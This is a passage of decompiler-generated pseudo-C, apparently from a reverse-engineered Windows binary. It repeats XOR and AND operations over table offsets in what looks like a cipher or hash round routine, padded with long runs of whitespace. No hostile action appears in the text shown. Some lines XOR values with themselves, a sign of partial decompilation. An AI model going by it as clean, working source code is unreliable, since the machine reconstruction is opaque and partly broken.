                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1774 + _t1602 * 8 - 0x2ac);
                                                                                                                                                                                                                                                                  						_t1603 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1775 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1775 + _t1603 * 8 - 0x70);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1775 + _t1603 * 8 - 0x6c);
                                                                                                                                                                                                                                                                  						_t1604 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1776 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1430 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2059 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1776 + _t1604 * 8 - 0x78) &  *(_t2059 + _t1430 * 8 - 0x90) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1776 + _t1604 * 8 - 0x74) &  *(_t2059 + _t1430 * 8 - 0x8c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1777 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1431 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1608 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2060 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1431 + _t1777 * 8 - 0xe0) &  *(_t2060 + _t1608 * 8 - 0x200) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1431 + _t1777 * 8 - 0xdc) &  *(_t2060 + _t1608 * 8 - 0x1fc) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1611 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2061 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2061 + 0x18 + _t1611 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2061 + 0x1c + _t1611 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1612 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1786 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1786 + _t1612 * 8 - 0x2a8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1786 + _t1612 * 8 - 0x2a4);
                                                                                                                                                                                                                                                                  						_t1613 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1787 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1787 + _t1613 * 8 - 0x68);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1787 + _t1613 * 8 - 0x64);
                                                                                                                                                                                                                                                                  						_t1614 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1788 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1441 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2066 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1788 + _t1614 * 8 - 0x70) &  *(_t2066 + _t1441 * 8 - 0x88) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1788 + _t1614 * 8 - 0x6c) &  *(_t2066 + _t1441 * 8 - 0x84) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1789 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1442 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1618 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2067 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1442 + _t1789 * 8 - 0xd8) &  *(_t2067 + _t1618 * 8 - 0x1f8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1442 + _t1789 * 8 - 0xd4) &  *(_t2067 + _t1618 * 8 - 0x1f4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1621 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2068 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2068 + 0x20 + _t1621 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2068 + 0x24 + _t1621 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1622 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1798 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1798 + _t1622 * 8 - 0x2a0);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1798 + _t1622 * 8 - 0x29c);
                                                                                                                                                                                                                                                                  						_t1623 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1799 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1799 + _t1623 * 8 - 0x60);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1799 + _t1623 * 8 - 0x5c);
                                                                                                                                                                                                                                                                  						_t1624 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1800 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1452 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2073 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1800 + _t1624 * 8 - 0x68) &  *(_t2073 + _t1452 * 8 - 0x80) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1800 + _t1624 * 8 - 0x64) &  *(_t2073 + _t1452 * 8 - 0x7c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1801 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1453 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1628 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2074 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1453 + _t1801 * 8 - 0xd0) &  *(_t2074 + _t1628 * 8 - 0x1f0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1453 + _t1801 * 8 - 0xcc) &  *(_t2074 + _t1628 * 8 - 0x1ec) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1631 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2075 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2075 + 0x28 + _t1631 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2075 + 0x2c + _t1631 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1632 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1810 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1810 + _t1632 * 8 - 0x298);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1810 + _t1632 * 8 - 0x294);
                                                                                                                                                                                                                                                                  						_t1633 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1811 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1811 + _t1633 * 8 - 0x58);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1811 + _t1633 * 8 - 0x54);
                                                                                                                                                                                                                                                                  						_t1634 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1812 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1463 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2080 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1812 + _t1634 * 8 - 0x60) &  *(_t2080 + _t1463 * 8 - 0x78) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1812 + _t1634 * 8 - 0x5c) &  *(_t2080 + _t1463 * 8 - 0x74) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1813 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1464 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1638 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2081 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1464 + _t1813 * 8 - 0xc8) &  *(_t2081 + _t1638 * 8 - 0x1e8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1464 + _t1813 * 8 - 0xc4) &  *(_t2081 + _t1638 * 8 - 0x1e4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1641 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2082 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2082 + 0x30 + _t1641 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2082 + 0x34 + _t1641 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1642 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1822 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1822 + _t1642 * 8 - 0x290);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1822 + _t1642 * 8 - 0x28c);
                                                                                                                                                                                                                                                                  						_t1643 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1823 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1823 + _t1643 * 8 - 0x50);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1823 + _t1643 * 8 - 0x4c);
                                                                                                                                                                                                                                                                  						_t1644 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1824 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1474 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2087 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1824 + _t1644 * 8 - 0x58) &  *(_t2087 + _t1474 * 8 - 0x70) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1824 + _t1644 * 8 - 0x54) &  *(_t2087 + _t1474 * 8 - 0x6c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1825 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1475 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1648 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2088 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1475 + _t1825 * 8 - 0xc0) &  *(_t2088 + _t1648 * 8 - 0x1e0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1475 + _t1825 * 8 - 0xbc) &  *(_t2088 + _t1648 * 8 - 0x1dc) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1651 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2089 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2089 + 0x38 + _t1651 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2089 + 0x3c + _t1651 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1652 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1834 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1834 + _t1652 * 8 - 0x288);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1834 + _t1652 * 8 - 0x284);
                                                                                                                                                                                                                                                                  						_t1653 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1835 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1835 + _t1653 * 8 - 0x48);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1835 + _t1653 * 8 - 0x44);
                                                                                                                                                                                                                                                                  						_t1654 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1836 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1485 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2094 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1836 + _t1654 * 8 - 0x50) &  *(_t2094 + _t1485 * 8 - 0x68) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1836 + _t1654 * 8 - 0x4c) &  *(_t2094 + _t1485 * 8 - 0x64) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1837 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1486 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1658 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2095 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1486 + _t1837 * 8 - 0xb8) &  *(_t2095 + _t1658 * 8 - 0x1d8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1486 + _t1837 * 8 - 0xb4) &  *(_t2095 + _t1658 * 8 - 0x1d4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1661 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2096 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2096 + 0x40 + _t1661 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2096 + 0x44 + _t1661 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1662 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1846 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1846 + _t1662 * 8 - 0x280);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1846 + _t1662 * 8 - 0x27c);
                                                                                                                                                                                                                                                                  						_t1663 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1847 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1847 + _t1663 * 8 - 0x40);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1847 + _t1663 * 8 - 0x3c);
                                                                                                                                                                                                                                                                  						_t1664 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1848 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1496 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2101 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1848 + _t1664 * 8 - 0x48) &  *(_t2101 + _t1496 * 8 - 0x60) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1848 + _t1664 * 8 - 0x44) &  *(_t2101 + _t1496 * 8 - 0x5c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1849 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1497 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1668 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2102 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1497 + _t1849 * 8 - 0xb0) &  *(_t2102 + _t1668 * 8 - 0x1d0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1497 + _t1849 * 8 - 0xac) &  *(_t2102 + _t1668 * 8 - 0x1cc) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1671 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2103 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2103 + 0x48 + _t1671 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2103 + 0x4c + _t1671 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1672 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1858 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1858 + _t1672 * 8 - 0x278);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1858 + _t1672 * 8 - 0x274);
                                                                                                                                                                                                                                                                  						_t1673 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1859 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1859 + _t1673 * 8 - 0x38);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1859 + _t1673 * 8 - 0x34);
                                                                                                                                                                                                                                                                  						_t1674 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1860 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1507 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2108 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1860 + _t1674 * 8 - 0x40) &  *(_t2108 + _t1507 * 8 - 0x58) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1860 + _t1674 * 8 - 0x3c) &  *(_t2108 + _t1507 * 8 - 0x54) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1861 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1508 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1678 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2109 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1508 + _t1861 * 8 - 0xa8) &  *(_t2109 + _t1678 * 8 - 0x1c8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1508 + _t1861 * 8 - 0xa4) &  *(_t2109 + _t1678 * 8 - 0x1c4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1681 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2110 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2110 + 0x50 + _t1681 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2110 + 0x54 + _t1681 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1682 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1870 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1870 + _t1682 * 8 - 0x270);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1870 + _t1682 * 8 - 0x26c);
                                                                                                                                                                                                                                                                  						_t1683 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1871 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1871 + _t1683 * 8 - 0x30);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1871 + _t1683 * 8 - 0x2c);
                                                                                                                                                                                                                                                                  						_t1684 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1872 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1518 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2115 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1872 + _t1684 * 8 - 0x38) &  *(_t2115 + _t1518 * 8 - 0x50) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1872 + _t1684 * 8 - 0x34) &  *(_t2115 + _t1518 * 8 - 0x4c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1873 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1519 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1688 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2116 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1519 + _t1873 * 8 - 0xa0) &  *(_t2116 + _t1688 * 8 - 0x1c0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1519 + _t1873 * 8 - 0x9c) &  *(_t2116 + _t1688 * 8 - 0x1bc) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1691 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2117 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2117 + 0x58 + _t1691 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2117 + 0x5c + _t1691 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1692 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1882 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1882 + _t1692 * 8 - 0x268);
